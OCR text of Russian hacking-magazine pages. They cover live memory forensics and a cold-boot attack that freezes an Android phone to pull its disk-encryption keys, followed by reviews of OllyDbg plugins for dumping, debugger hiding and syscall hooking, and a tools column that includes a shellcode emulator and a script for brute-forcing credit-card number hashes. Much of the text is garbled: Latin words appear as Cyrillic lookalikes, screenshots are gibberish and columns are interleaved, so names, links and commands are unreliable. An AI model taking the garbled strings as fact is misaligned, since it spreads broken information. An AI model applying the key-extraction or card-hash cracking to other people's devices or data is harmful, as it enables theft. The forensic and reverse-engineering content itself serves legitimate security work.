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на документирование процесса: это необходимо для того, что- 
бы найденные улики смогли быть представлены в суде в каче- 
стве вещественных доказательств. 

Для того чтобы собранные улики превратились в твердую 
доказательную базу, эксперту приходится не только подробно 
документировать каждый свой шаг, но и быть готовым высту- 
пить в суде, доказывая обоснованность использования тех или 
иных методов и инструментов. 

Использование программ для снятия образа оперативной 
памяти неизбежно оставляет следы в памяти компьютера. 
Сама программа занимает место в памяти, а раз так — какое- 
то количество оригинальных данных будет вытеснено (переза- 
писано). Поэтому нужно использовать программу с минималь- 
ным объемом занимаемой оперативной памяти, а сам факт 
частичной перезаписи содержимого требуется тщательно 
задокументировать. Еще совсем недавно суды отказывались 
принимать в качестве вещественных доказательств данные, 
которые были изменены в процессе их получения. Сейчас си- 
туация меняется: суды начинают понимать, что в некоторых 
случаях невозможно сделать омлет, не разбив яйцо. 


Анализ работающего компьютера 
или исследование содержимого 
жесткого диска? 

Как было сказано выше, анализ запущен- 
ной машины неизбежно влияет на содер- 
жимое оперативной памяти. Во многих 
случаях могут измениться и данные, за- 
писанные на жестком диске. И тем не ме- 
нее в некоторых случаях специалисты 
не спешат выключать компьютер. 

Когда же необходимо проводить ана- 
лиз запущенного компьютера? Как пра- 
вило, к такому анализу прибегают в слу- 
чаях, когда на жестком диске компьютера 
не ожидают найти существенных улик, 
а вот исследование данных, доступных 
через открытые на компьютере сетевые 
соединения, способно принести замет- 
ные дивиденды. 

При выключении компьютера теряет- 
ся доступ к внешним сетевым ресурсам 
и УРМ-сессиям. Если компьютер исполь- 
зовался кактерминал, а реальные данные 
хранятся где-то на удаленном сервере, 
эксперту приходится анализировать тех- 
нику вживую. С таким способом анализа 
связано большое количество рисков, а для его проведения 
требуется эксперт высочайшей квалификации (и разрешение 
суда). Соответственно, прибегают к исследованию запущен- 
ного компьютера нечасто. 


Конфискуем компьютер 

Поставим себя на место эксперта-криминалиста. Имеется 

работающий компьютер, нам нужно исследовать его содержи- 

мое. Наши действия? 

До недавнего времени компьютер выключали (зачастую — 
просто обесточивали, чтобы не дать сработать программам, 
очищающим лог-файлы при завершении рабочей сессии), 
после чего из него извлекали все жесткие диски, которые 
подключали к устройству, блокирующему операции записи. 
С дисков снимали виртуальные образы, и уже с ними в спо- 
койной обстановке работал эксперт. 

С развитием технологии этот способ устарел. Вот, кприме- 
ру, какие рекомендации дает официальная инструкция АСРО 
(АззосаНоп о СшегРойсе О@сег$) британским полицейским: 
. Провести оценку рисков. Есть ли необходимость и возмож- 

ность снять копию эфемерных данных? 

. Если возможность существует, установить устройство 
для снятия слепка оперативной памяти (флешка, внешний 
диск и тому подобное). 

Запустить программу для снятия образа памяти. 

. По завершении работы программы корректно остановить 
работу устройства. 

. Извлечь устройство, использованное для снятия образа 
памяти. 


ТприуЕтетогу бе 
(2) Метюсу дитр 
С) Негпабол бе 
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Подробнее об атаке с ис- 
пользованием Нге\/Лге 
можно почитать здесь: 

БИ.у/ЕУКЕБ, 


Ьи.|у/б0ЕО9$ 
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Проверить корректность сохраненного образа (для этого 
в обязательном порядке используется компьютер следо- 
вателя, а не компьютер, который анализирует эксперт). 

. После проверки снятого образа немедленно перейти 
к процедуре выключения компьютера. 


ЧТО МОЖНО УЗНАТЬ О ТЕЛЕФОНЕ, 

ПОЛОЖИВЕГО В МОРОЗИЛКУ 

Забавное исследование провели немецкие ученые. При ана- 
лизе оперативной памяти телефона под управлением опера- 
ционной системы Апаго они использовали бытовую моро- 
зильную камеру (Би.1у/Ха9ххм). 

Идея заморозитьтелефон связана с появлением в системе 
Апагога 4.0 возможности шифрования разделов. Эта функция 
не позволяет исследователю получить доступ к информации, 
записанной в заблокированном телефоне, без введения кор- 
ректного пароля. Поскольку подбор пароля — дело длитель- 
ное и неблагодарное, исследователи решили поискать способ 
обойти защиту. 

Точно так же, как и в ставших уже привычными криптокон- 
тейнерах, ключи для расшифровки за- 
писанных в телефоне данных хранятся 
в оперативной памяти устройства. Если 
бы существовала возможность извлечь 
эти ключи, исследователи смогли бы ис- 
пользовать их для расшифровки содер- 
жимого устройства. 

Возможность снять образ оператив- 
ной памяти устройства под управлением 
Апаго существует: для этого телефон 
переводится в специальный отладочный 
режим Таз1боот; в память инсталлируется 
специальная программа, и образ опера- 
тивной памяти можно скачать через ЦЗВ. 
Проблема здесь в том, что при переза- 
грузке телефона в отладочный режим со- 
держимое оперативной памяти успевает 
обнулиться. 

Чтобы замедлить процесс обнуления 
памяти, ученые положили телефон в мо- 
розилку, заморозив его до температуры 
—15 градусов. При такой низкой темпе- 
ратуре ячейки памяти меняют состоя- 
ние очень медленно. Соответственно, 
при выключении охлажденного телефона 
и моментальной его перезагрузке в отла- 
дочный режим содержимое оперативной 
памяти не успевает обнулиться. Эксперимент оказался удач- 
ным: исследователям удалось извлечь из телефона двоич- 
ные ключи, с помощью которых были зашифрованы разделы 
с пользовательскими данными. 

Подробнее об этом эксперименте можно прочитать на сай- 
те университета. Там же доступен пакет программ ЕВОЗТ, с по- 
мощью которого скачивается образ оперативной памяти и из- 
влекаются криптоключи: БИ.1у/Ха9ххм. 


ЗАКЛЮЧЕНИЕ 

Работа «цифрового» криминалиста интересна и необычна. 
Квалифицированных экспертов не хватает всегда и везде. 
На одной американской конференции начальник городско- 
го полицейского управления сетовал на плотность графика 
компьютерных криминалистов: на исследование каждого кон- 
фискованного устройства эксперт может уделить не более 
сорока минут. Что можно успеть сделать за сорок минут? С ис- 
пользованием программ, описанных в этой статье, — очень 
и очень немало. = 


Если компьютер использовался как тер- 
минал, а реальные данные хранятся где- 
10 на удаленном сервере, эксперту прихо- 
дится анализировать технику вживую 
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Многие реверсеры не понаслышке 
знакомы с ОПу)Ба — бесплатным 
32-битным отладчиком пользователь- 
ского режима (ппд 3). Основные его 
плюсы: бесплатность, малый размер, 
интуитивно понятный интерфейс, 
простота управления и поддерж- 

ка плагинов, которые существенно 
расширяют его функциональность. 
На сегодняшний день насчитывается 
свыше 500 плагинов, и среди этого 
разнообразия мы постарались выде- 
лить для тебя наиболее интересные. 


Сайт: Ыу/16066В1 риши | | | 
Для: ОПУОБд 1.10/2.01, иптипйНуОБа 1.7/1.8, ОА Рго, М/пОБод 6 ‚С Моде Е С-\ Зураб иле Ростове я аня [2тр _] 
С Матюу [00243000 [00155000] # [итыно 2 / Рюемиат / из -] 


При решении различных задач, связанных с реверс-инжинирингом, а если < Адаень [б0А4700 — Сагксей | 
точнее — при работе с вредоносным программным обеспечением, которое беьке © Вывбь С ММыо С Авен Ныюе АБО —- АО — 

активно использует различные обфускаторы и упаковщики, довольно ча- Сир Мое: С Веый4 © ВомиВа— С Вим 

сто приходится производить дамп памяти процесса для последующего его бемси Моде ба — © ААМетох аська НЫЗРЕ] 

анализа. Так как процесс активен, то большинство его упаковщиков и обфу- РЕбошек (© Меюу С ОВК Зваисй РЕ | Ребсал Мепкху | 

скаторов уже отработали и можно видеть почти истинное лицо негодяя. Так ИН 

что дампер памяти процесса в таких задачах вещь незаменимая. Каждый ис- |мпазе Вазе: [10000000 Ры Инна! ОЙза № Рае Опота! СВагасдеййся (Чеед Резо) 
следователь отдает предпочтение тому или иному отладчику, например из-за бесбоп Або: [00001000 Е ме а 


набора плагинов, но порой необходимо их варьировать, а интерфейс и воз- Еву Роех— [6001003 ЕВ Г Ао Аи твое Ваза Афезя 
можности плагинов хотелось бы иметь одинаковые вне зависимости от от- о Г. Аеби базбиесвоту [Ройсим ИпадеВазе Сьаикое] 
ладчика. ОПубитрЕх решает данную проблему — он позволяет очень гибко С Зесбии 
дампить память и поддерживает несколько самых популярных отладчиков: ее АЛ ы Зеес\ ВазеМ ы Зее ===. эеея не _Резаесь А! | 
ОПУОБа 1/2, ттипйку ЭБебиоадег 1.7/1.8, РА Рго, \МтОБд. Особенности инстру- 
мента: 
. выбор для дампа ЕХЕ-файла, О. или иного модуля; 
поиск МЯ/РЕ-сигнатур в памяти; 
поддержка РЕЗ2+; 
поддержка нативных 64-битных процессов (пока только в РА Рго); 
дамп любого адресного пространства как секции (даже если ее нет в за- 
головке секций); 
добавление пустых секций; РЕЗ2 Ц юадеЧ, Ваза 4ез3=00244700, Ресайюл, 1пабеВ аз Мнтайсь, ОигпрВ ми Рам 
правка Н\А в ВааОиеогу для последующего изменения |тадеВазе; 
автовычисление большого количества параметров (Рам5те, РамОН$е, 
МтиаюЮ"|$а и других). ОПНубитрЕхза работой 


ПОЗА ЕСО Риостоп р 00001000 ОООЗАВА, 
ОО2АЕТО0  ОО0О0Е Риоспиол ; 00008000 00000043 
ПОРЫ Росиии „да | 00006000 — 00001200 
ОО2АРВО0 Руостой 0000Е000 00001354 
бО2ВОРОО Риостой | 00010000 00001095 
ОО2в21О0 00 Ростом } 00012000 — 00000348 
00282500 Риостол : 00013000 00000858 
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Сайт: БИ.у/1Ьат9! 
Для: ОНУОБа 1.10/2.01, иптипйу0Бо 1.7/1.8, ОА Рго, \МпоБа 6 


Каждый дебаггер имеет как сильные, так и слабые стороны, 
и у каждого они свои — идеального инструмента нет. В одном 
удобно обходить антиотладочные приемы, в другом исполь- 
зовать огромный арсенал уже готовых плагинов, а в третьем 
писать собственные скрипты. С недавних пор стало возможно 
работать последовательно сразу в ОПУОБд, птипНу Оебиддег, 
\ММпОБоа и ПРА Рго. Как? Встречай ОПуМюгае Ршидт — данный 
плагин позволяет передавать процесс отладки другому отлад- 
чику без перезапуска исследуемого приложения. Так что мы 
можем задействовать только сильные стороны каждого от- 
ладчика, используя миграцию от одного к другому. Например, 
мы можем начать с ОПУОБа для обхода антиотладочных при- 
емов и нахождения ОЕР (Опдта! Етгу Рот®), а затем передать 
управление |ттипКу Оебиоддег и, благодаря его поддержке 
Ру{Поп-скриптов, править обфусцированную прот ТаЫе. 
Как ты уже понял, плагин поддерживает: ОПуОБа 1/2, иптипНу 
Оебиовадег 1.7/1.8, ША Рго, \ММпОБа. Особенности: 

._ многопоточность и возможность приостанавливать потоки; 

. перенос настроек софтверных точек останова. 
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Передаем полномочия по дальнейшей отладке ИттипНу Оебиддегу 


ОНУНЕАРТВАСЕ 
Сайт: 
Для: ОПУОБд \1.10 


Плагин для трассировки манипуляций с кучей. Предназна- 
чен в первую очередь для отладки переполнений кучи, когда 
необходимо контролировать расположение кучи во время 


перезаписи определенной структуры, например заголовка 
блока, структуры критической секции или других прикладных 
данных. При активации плагин автоматически создает точки 
останова (РИАЙосмщенеар, ВЧЕгееНеар, АИСтеменНеар, ВИОе- 
ЗгоуНеар, АНАеАПосжщеНеар, РИЗхеНеар, СеРгосез5Неар 
апа РАИпШанхеСийса!есйоп, ВРИещеСийса!Зесйоп) и запи- 
сывает необходимую информацию, когда их достигает. 
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Результат работы 
ОПубоскеПгасе. Трас- 
сапереданных данных 


Сайт: БЦуЛеС2910 
Для: ОПУОБсд \1.10 


Плагин для трассировки всех операций с сокетами, выполняе- 
мых процессом. Во время выполнения программы записывает 
все отправленные и принятые буферы, а также все параметры, 
переданные в сетевые функции, и возвращенные этими функ- 
циями значения. 

В настоящее время поддерживаются следующие операции 
с сокетами: М/ЗА$оска, \М/ЗААссерт, \М/ЗАСоппест, М/ЗАВесу, 
\ММЗАВес\уРгот,  \М/ЗАЗепа, \/ЗАбепаТто,  \МЗААзупсЗеест, 
\ММЗАЕует15еес{, \МЗАСюозеЕует, ПЗеп, юс|Чзоске, соппесф, 
па, ассер\, зоске, созезоска, зпщаомт, гесу, гес\тот, зепа 
и зепато. 

Просто запусти плагин, когда захочешь отследить опера- 
ции, проводимые над сокетами. ОПуЗоскейгасе автоматически 
расставит все необходимые брейкпоинты и будет записывать 
всю необходимую информацию, как только они будут срабаты- 
вать. Чтобы посмотреть получившийся результат, надо выбрать 
пункт меню ОПубоскейгасе 109. 


Особенности: 

просмотр трассировки кучи; 

подсветка разными цветами каждой отдельной трассировки 
кучи; 

фильтрация «лишней» информации для конкретной кучи. 


ОруНеарТгасе 


6-00 144Е В? 
0.00 1445 @9 
ИО ЦН 


Логманипуляций над кучей 


95 


РУ 


Все упомянутые в статье 
плагины ждуттебя 

на диске, аккуратно раз- 

ложенные по папочкам. 


АА 


Большое количество 
плагинов для ОПуО6с: 


ОрепАСЕ: ОПу0Ь9 
Ридт$ (БИ.у/п3М059) 


Ти{$ 4 Уои: ОПу069 
Агсиме (БИ.1у/Лед]аг4) 


КАК УСТАНАВЛИВАТЬ ПЛАГИНЫ? 


Для начала необходимо создать в директории программы папку с на- . ОШОВСО \1.10: выбираем Ор#оп$ -› Арреагапсе и закладку 
званием Р!идт$. Это позволит в дальнейшем избежать замусоривания Онестопе$. В пункте Рот ра! указываем путь к папке с плагинами. 
основной директории, а в случае необходимости без труда отыскать . ОШОВСО \2.011: выбираем ОрНоп$ —> ОрНоп$ и раздел Опесюпез. 
неработоспособный/конфликтный плагин. Далее копируем ОШ--файл В пункте Р\удт атестогу указываем путь к папке с плагинами. 
плагина в созданную директорию, после чего запускаем отладчик 


и указываем путь к этой папке: Перезапускаем отладчик и ищем появившийся пункт в меню Ридтз. 


НАСТРОЙКА __ 
ГРАФИЧЕСКОЙ 
СХЕМЫ 


Стандартная цветовая 
схема ОПУОБд доста- 
точно скучна и не очень 
информативна. К ней, 
конечно, со временем 
можно привыкнуть, 
но лучше настроить 
внешний вид так, чтобы 
глаз мгновенно ориен- 
тировался в ассемблер- 
ном листинге. В конце 
концов, от этого зависит 
продуктивность работы. 
Настроить цветовую 
схему можно двумя 
способами: непосред- 
ственно из меню «Оп- 
ции — Оформление —> 
Сооиг5» или через 
правку файла оПу9Ь9. ит. 
Ищешь в файле секцию 
[Со!оиг$] и играешься 
снастройками цветов 
по своему желанию. 
Подробно этот процесс 
описан на официальном 


сайте: БИ.1у/1с@В27г. 


РУБОМ 
Сайт: 
Для: ОПУОБСд \2.01 


Почему так много реверсеров пользуются !ттипйу Бебиоадег? 
Да потому, что он, как и ПРА, имеет встроенную поддержку 
РУпоп. Этот скриптовый язык здорово упрощает исследова- 
ние бинарного кода, позволяя быстренько накидать небольшой 
скриптик, автоматизирующий ту или иную рутинную задачу. 
ОГуОБа же мог похвастаться только поддержкой скриптов, на- 
писанных на ассемблероподном языке (при наличии установ- 
ленного ОБбазсиру). 

К счастью, парень под ником Ра о Езсорбаг решил не ми- 
риться с таким положением дел и написал плагин для ОПУОБсд, 
интегрирующий в него поддержку РУПоп, — РУЙом, Теперь 
можно писать скрипты, автоматизирующие рутинную рабо- 
ту реверсера, которые будут запускаться внутри отладчика 
и иметь доступ к большинству ОПуОБа АР!. Плагин распростра- 
няется в исходниках, поэтому скажу пару слов про его сборку. 
Для его компиляции понадобится \М!зца| З+иаю 2010, библиотека 
Воо$+, скомпилированный Воо$1.РУПоп и 32-разрядная версия 
РуПоп 3З.х (было протестировано на 3.2). В зависимости от на- 
строек ОС тебе, возможно, придется указать Воо${ все установ- 
ленные в твоей системе версии РУПоп, а затем выбрать нужную 
во время сборки. Это можно сделать, добавив в файл /Боо$*+- 
91г/%001$/6и11а/\2/изег-сопйФ. ат строки вида: 


Главное тут — указать правильный путь до интерпретатора. По- 
сле чего собрать Воо$1.РУПоп с помощью команды: 


--Би11а-Еуре=сотр1ефе ‹ _ 


Если возникнут какие-то трудности, то официальный мануал 
Воо$1 должен помочь: 


Сайт: 0{.1у/19с55с5 
Для: ОПУОБд \2.01 


Одна из фич, которая меня особенно привлекает в ША Ро, 

возможность представить функцию в виде графа. Так намного 
удобнее анализировать код, сразу становится видно, каким 
образом мы дошли до того или иного участка, какие условия 
и как сработали. Плюс можно еще посмотреть граф вызовов, 
чтобы понять, из каких мест программы вызывается иссле- 
дуемая функция. К счастью, данная возможность есть теперь 
и в ОПУОБд, надо лишь установить плагин ОПуСгарй. Он позво- 
ляет представить программу в виде блок-схем, схожих с теми, 
что строятся в РА Рго. Более того, для визуализации использу- 
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Сайт: 6(./у/19Х2СоВ 
Для: ОПУОВС \1.10 


Довольно любопытное расширение, которое позволяет пере- 
хватывать системные вызовы из пользовательского режима. 
Техника перехвата интересна, поэтому рекомендую ознако- 
миться с ней в блоге автора (6Ии.1у/О]хУМ] для М/Апаом$ ХР, БИ.У/ 
МИ\А\/6 С! для ММпаом$ 7). Все, что требуется от пользователя, — 
установить плагин и написать свою ОШ-библиотеку, в которой 
будут реализованы обработчики перехватываемых функций. 
Как ее реализовать, можно посмотреть по уквзанным ссылкам 
или изучить исходный код примера (0(.1у/168КсЕ2), который 
любезно предоставил автор данного расширения. 

Такой плагин может пригодиться для решения различных 
задач, например при анализе вредоносных программ и распа- 
ковке. 
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Инжектим библиотекудля перехвата системных функцийизиз$ег-то4е 


0 бе Алква Гы! 
Сомеииы Гога фыя Сай Сань 
гаги ЗН Гирту бьоН, 


Прнетие ХНаН Го Бена 
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пеаены плов Иен 


Согбариикь Ройн № Итера 
ааый 


Вызываем ОПНуНо\ для построения графа 


ется тулза млмпдгарйЗ2, входящая в состав иды. Для версии 1.10 
есть альтернативный плагин ОПуНом ( ==) — немного 
улучшенная версия ОПуСгарп от того же автора. 


ПЛАГИНЫ ПЕРВОЙ НЕОБХОДИМОСТИ 


Помимо продвинутых плагинов, которые могут использоваться не так уж часто, необходимо также иметь и джентльменский набор на каждый день. Обычно 

в такой набор включают следующие расширения: 

 Соттапа Ваг (01.1у/14СНОсг) — аналог встроенного плагина Соттапа Ипе. Добавляет панель с командной строкой для ввода команд управления отладчи- 
ком, что позволяет ускорить процесс отладки. 

Ма0) — антиотладочный плагин от российского разработчика для скрытия ОПУОБд и исправления уязвимостей отладчика, эксплу- 
атируемых различными протекторами. Помогает от большинства распространенных методов обнаружения. 

. Похожим функционалом обладает плагин китайского происхождения ЭнопоаОр (ЬН.1 


. РпатмОт Ршот (51.1 


из РВатОт. 


гагАа). Ходили даже слухи про обнаруженный в нем рипнутый код 


. Антиотладочные свойства также присутствуют и в Оу Адуапсеа (6(.1у/14С!ОАп). Это своего рода швейцарский армейский нож, который, помимо прочего, 
расширяет функционал ОПУОБад и устраняет некоторые раздражающие вещи и ошибки данного отладчика. 
.‚ Неменее важный плагин — ОБВ@Зсир+ (61.1у/17152АМ), позволяющий писать и выполнять скрипты для автоматизации необходимого процесса, например 


распаковки файлов. 


. Замыкает список ОПубитр (61.1у/171$4$1!) — отличный дампер процесса со встроенным реконструктором таблицы импорта. 
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Открываем сайт М$ОМ вместо стандартного файла справки 


ОВЕВЗТЕАЕТН 
Сайт: 
Для: ОПУОБа \2.01, РА Рго 


На какие только ухищрения не пойдут разработчики программ, 
чтобы защитить свое детище от исследования! Особенно таки- 
ми подарками изобилуют различные упаковщики, хотя и среди 
обычных программ тоже довольно часто встречаются особи, на- 
шпигованные антиотладочными приемами. Вручную обходить 
все эти защиты просто заморишься — тут уже одной правкой 
возвращаемого функцией 1$ВебиадегРгезе значения не обой- 
дешься. Вот и приходится использовать спецсредства в виде 
данного плагина. Поставляется он в исходниках, так что при- 
дется собирать вручную. Для этого понадобится библиотека 
Воо$1 >=1.48.0, \МТЕ (\ММпаоми5 Тетр!ае Мбгагу) >=8.1, \ММпЧо\м$ 
Оимег КК >= 7.0, ООКВина. Да-да, зрение тебе не изменило — 
\\МОК & ООК, так как для своего сокрытия отладчик использует 
драйверы. Ну и конечно же, \Лзиа! З4иаю 2008. 

Что интересно, плагин работает не только в ОПУОБд, 
но и в РА Рю. 


Сайт: БК./у/16ЕТ7. 
Для: ОПУОБса \1.10 


Одной из полезных фич, появившихся во второй версии 
ОПУуОБод, была функция Ощасй, которая позволяла «отсоеди- 
нить» отладчик от исследуемого процесса, чтобы процесс 
мог дальше самостоятельно работать. К сожалению, в вер- 
сии 1.10, любимой многими, такой функции нет — можно 
только присоединиться к исследуемому процессу. Это лег- 
ко исправить, поставив плагин ОщаспйМе, который позволя- 
ет в любое время отсоединить отлаживаемые программы 
от ОПуОБад и продолжить осуществлять внешний контроль над 
отладчиком. Кроме того, отключение программных и процес- 
сорных точек останова никак не повлияет на соответствую- 
щие УО00-файлы. 
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Сайт: БЕ у/НАВОТР 
Для: ОПУОБа \1.10, ИттипНу Оебчодег 1.7/1.8 


Количество функций \М/пАРГ огромно, и знать их все как свои 
пять пальцев просто нереально. Поэтому иногда приходится 
заглядывать в документацию, чтобы уточнить/узнать, что воз- 
вращает та или иная функция или какие параметры принима- 
ет на вход. К сожалению, стандартный файл помощи не может 
предоставить всю необходимую информацию, поэтому прихо- 
дится запускать браузер и идти на М$ОМ. Так почему бы полно- 
стью не заменить этот файл оп!те-документацией? Для этого 
всего-то надо установить плагин ОПУМ$ОМ. Убеждаемся, что 
что в качестве справки у нас стоит файл МММЗ2.НЕР (Помощь -—> 
Выбрать справку по АР!). Если такого файла нет, то необходимо 
создать пустой с таким именем и указать его О!у. Теперь, когда 
ты попытаешься в отладчике получить доступ к файлу справ- 
ки, плагин перехватит функцию \\ИпНе!р() АР! и вместо старого 
файла откроет тебе сайт М$ОМ. А чтобы получить информацию 
о конкретной функции во время отладки, надо кликнуть правой 
кнопкой мыши на инструкцию сай и выбрать пункт «Нер оп 
зутрбойс пате» или просто нажать <С\ + Е1>. 


бага нА "100 Е у 


Сре орыь | Академ 
Ава: Тесвобонлее (2) 


ние Собр ао 
БрезИН Теснейциния {1 


Сымтыет САН Теа 
Мсвыгис неси. Раба: петофнег Е Ыбныка росе а] 
Ка оны пение оеблокя Роба тай АИГ] 
Мода ке Рио Саб пет аж Пит Кетпа 
МЕнету Тины Боже ожоеие (БиСбоконыв СРО ео нокодомаыг РИ ечненты 
О а а - 1, е 
| Акпевсе Ни ВР реозееВсит ССосфелй АРТ рег се Бои Свена ой ив 
Берегнкии + беРиегекилех + етих сии Ре Бет МЛ 33] 
Гелртоиией МЫС ГКАо ЗА бен Ложыг Ех сербия Сина ие 


Сев Расе 
5! | сывикууегРГереГИ Ал РЕЯ, Вере ик] 


5] НЫ БаАа зн обоя Рича Йа 
| НелоРьм # РогееЫм [Рае обет Вело 


ЮВ Еле 
у’ па вре нет срерокорыт вЪыг Е 
рае врем минет СНебокороне ВУ акоРыеый 
УБегзтеанИ — 
основные тех- 
ники сокрытия 


Сайт: БИ. у/155КуйЬб 
Для: ОПУОБа \1.10 /\2.01 


Во время работы над бинарником реверсеру приходится до- 
бавлять достаточно много своей информации: писать коммен- 
тарии котреверсенным функциям, чтобы на следующий день не 
изучать заново алгоритм их работы и входные параметры, ста- 
вить брейкпоинты и так далее. Вся эта служебная информация 
автоматически сохраняется отладчиком в ЧУОО-файле. Но быва- 
ет так, что при падении дебаггера или его очередной переуста- 
новке эти файлы теряются. Чтобы избежать такой ситуации, 
можно воспользоваться плагином оЙуабд-баскир, который по- 
зволяет сделать бэкап информации, сохранив ее в С$\-файл, 
из которого ее можно загрузить обратно в отладчик. 


Брио РОСА Е ААА ННМЫОЗ ру 


фены РОСЯЩЕ си 


а. 
Гар ры = РТИ БФ геев. 


В 
| ее В ее а 
и 
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ОШУОВС РОК 


Плагинов на все случаи 
жизни не бывает, по- 
этому рано или поздно 
может настать момент, 
когда придется «шить 
наряд» для Оли самому, 
чтобы решить очередную 
амбициозную задачу. 
В таком случае тебе 
понадобится РОК — 
Ридт Беуе!ортег{ КИ, 
который можно скачать 
софициального сайта 


Ьи.1у/1800 716 или взять 


снашего диска. 


и | би 
син Ки 


ЗАКЛЮЧЕНИЕ 
ОПуОБа очень по- 
пулярный отладчик, 
плагинов для него 
существует доста- 
точно много, и про 
НИХ МОЖНО ДОЛГО 
рассказывать. Нашей 
целью не было рас- 
смотреть их все, 
мы лишь старались 
подобрать наи- 
более интересные 
«наряды» для нашей 
боевой подруги Оли. 
Надеюсь, что нам это 
удалось. 


ОПуаБд-БаскКчр. Бэкап 
служебной информа- 
ции в С5$\/-файл 


95 Взлом 


У\УАВММС 


Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
ция затвои действия ответственности не несут! 
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У 


Дмитрий «0191» Евдокимов, 
Она! Зесийу 


@е\докито\4$ 


Х-ТООЕЗ 


СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 


Автор: 

пазпегетаде 

ЦВЕ: п5Пг7а. 
могргез$.сот/ 


е-беаг 
=. --?— чечаакь Система: \\/п 


= 
изм» 
Ри 
7 
— 


Е 

АлЬлР МТ >в агни 
ра 
Флай РА але 


в |. 


РЕ-МИШКА 

РЕ-редакторы — инструменты не новые, и дав- 
но зарекомендовали себя как ти${ пауе в арсе- 
нале любого реверсера. Но в последнее время 
в данной области образовался какой-то застой 
и ничего нового и действительно интересного 
не появлялось. 

Хочется представить твоему вниманию но- 
вый инструмент для реверсинга исполняемых 
файлов — РЕ-Беаг. Утилита может похвастаться 
весьма богатым арсеналом возможностей, в том 
числе парой уникальных фишек: 

. поддержка как РЕЗ2, так и РЕбА; 

. просмотр нескольких файлов одновременно; 

. сигнатурное определение упаковщиков с по- 
мощью сигнатурного анализа (работает очень 
неплохо); 

. быстрый дизассемблер в комплекте (можно 
натравить на любое В\УА/Е!е-смещение); 

. наглядная визуализация секций; 

. функция сравнения двух РЕ-файлов; 

. интеграция с меню Ехр/огег (автор явно хо- 
тел добавить еще один пункт, но не знал ка- 
кой :). — Прим. ред.) и многое другое. 


Видно, что автор очень воодушевлен проек- 
том, — он выпускает релиз с кучей нововведений 
каждые пять-шесть недель. Его цель — сделать 
удобный редактор для та№Маге-аналитиков, и па- 
рень идет к своей цели. 

Для себя основной фишкой этого РЕ- 
редактора я бы назвал возможность одновре- 
менно изучать несколько исполняемых файлов 
в одном окне. К тому же пару раз мне очень 
пригождалась функция сравнения двух бинар- 
ных файлов. С ее помощью, к примеру, можно 
быстро сравнить патчи, и она же пригодится 
при создании сигнатур. 


Автор: Чеап-Ри!рре 
Теззег 

ОВЕ: окпиб.сот/ 
предн/ОЗХАиавог 


Система: Мас 


РОВЕМЗ!С$ ТООЕДЛЯ МАС 

О$ Х Ачцацог — это бесплатный инструмент 
на РУПоп для проведения компьютерных рассле- 
дований на машинах с ОЗ Х на борту. Для своей 
работы данный инструмент парсит и вычисля- 
ет хеши для определенного набора артефактов 
в запущенной системе или в образе системы, 
которую необходимо проанализировать. В итоге 
программа способна определить: 

. установленные расширения ядра; 

. системные агенты и демоны; 

. сторонние агенты и демоны; 

. элементы автозапуска; 

. скачанные файлы; 

. установленные приложения. 


Из этого перечня нетрудно понять, что в пер- 
вую очередь инструмент заточен для поиска воз- 
можных зловредов в системе (и не говори мне, 
что их нет для Мас). 

Помимо этого, из анализируемой системы 
можно извлечь: 

. файлы из карантина; 

. пользовательские данные из 
багап, РНгетох и Спготе; 

. данные из аккаунтов почты и соцсетей; 

. Данные об используемых \М/-Е!-точках. 


браузеров 


При этом для каждого извлеченного фай- 
ла можно проверить его репутацию на Теат 
Сутги’$ МНВ, УтизТофа, МаМаге!и или в соб- 
ственной локальной базе. А весь результат рабо- 
ты можно сохранить в простом текстовом файле 
или в НТМЁ-документе. Еще вариант — и вовсе 
отправить на 5узюд-сервер. 

Исследуй свой (ну или не свой) Мас, иты поч- 
ти наверняка узнаешь о нем много нового и ин- 
тересного :). 


Автор: Бама 7ттег 


ОВЕ: онпиб.сот/ 
477е/М$ _НВЕМУ 


Система: \\ п 


ие а" 


1 СьеабеРкосезяй< №) 


х=1269 
2ЕЧЕО 


АНАЛИЗИРУЕМ ШЕЛЛ-КОДЫ 

5саба — это инструмент для анализа шелл- 
кодов, который базируется на библиотеке эму- 
ляции Пбети. В своем роде это уникальный 
проект, который не имеет (по крайней мере пу- 
бличных) аналогов. 

Если жутко хочется узнать, что же делает 
шелл-код из эксплойта и при этом не стать его 
жертвой, самое верное решение — не выпол- 
нять шелл-код, а эмулировать его выполнение. 
Как раз это и делает $са6д. На текущий момент 
инструмент уже получил СУ! для настройки запу- 
ска анализатора, а сам анализатор является кон- 
сольным приложением, очень похожим на стан- 
дартный отладчик типа млпабд, только со своим 
набором команд. Среди них: пошаговое выпол- 
нение шелл-кода, брейкпоинты, просмотр сте- 
ка, просмотр цепочки 5еп, установка значений 
для регистров, список загруженных ОИ! и многое 
другое. Сейчас $саБд в своей базе содержит 199 
перехватываемых АР!-вызовов, 12 известных 
ОШ и 224 опкода. 

Как одно из самых последних и важных ново- 
введений можно выделить поддержку анализа 
ВОР-шелл-кодов — без которых сегодня уже ни- 
куда. Проект полностью на Си. 

Пример запуска 5с@бд для анализа НВОР- 
шелл-кода, базирующегося на гаджетах 
из ад\ар!32.а!: 


$с@бё -+ а\уар1_гор.$с -гор -гам += 
9х77а441000-с:\аЧ\уар1.Еехе.да{ -роКе «= 
90х7749а1404-9х7с9@ас9е 


О различных режимах запуска и решении ин- 
тересных кейсов с помощью $саба ты можешь 
почитать в постоянно обновляемом блоге автора 


запазриКе.сот/!09$. 
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ПРОТИВ 
КРЕДИТОК 


В общем, есть задача найти в файлах, сетевом трафике, базе 
данных и еще где бы то ни было карточные данные (Сага 


7 утилит для взлома и анализа безопасности 


РО\МЕВЪНЕЕЕ 


граммы: 


Митрег$, С\У и так далее). И очень часто находится хеш но- 


мера кредитной карты вместе с ее первыми шестью или по- 
следними четырьмя цифрами. Номера кредитных карт имеют 


Инструмент написан на Ромег5пе!. Пример запуска про- 
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Автор: Кап Гозааеп 


ОВЕ: перу. о КПиЬ.10/ 
РУ_СС Спескег 


Система: \\п 


СС _Спескег.р$1 -1 ТМРУТ_ЕТЕЕ -о ОУТРУТ_ЕТЕЕ -И += 


НАЗН_ТУРЕ [1-3] 


фиксированную длину, так что это значительно ограничивает 


пространство возможных значений, и, как следствие, воз- 
можно использовать ОпщЩе Тогсе атаку на найденный хеш. 


имеет следующий вид: 


СС_Спескег — реализация атаки и подтверждение того, что хе- 


ширования номеров для их безопасности явно недостаточно. 


Автор: эпаге7 


ОВЕ: оцпиб.сот/ 
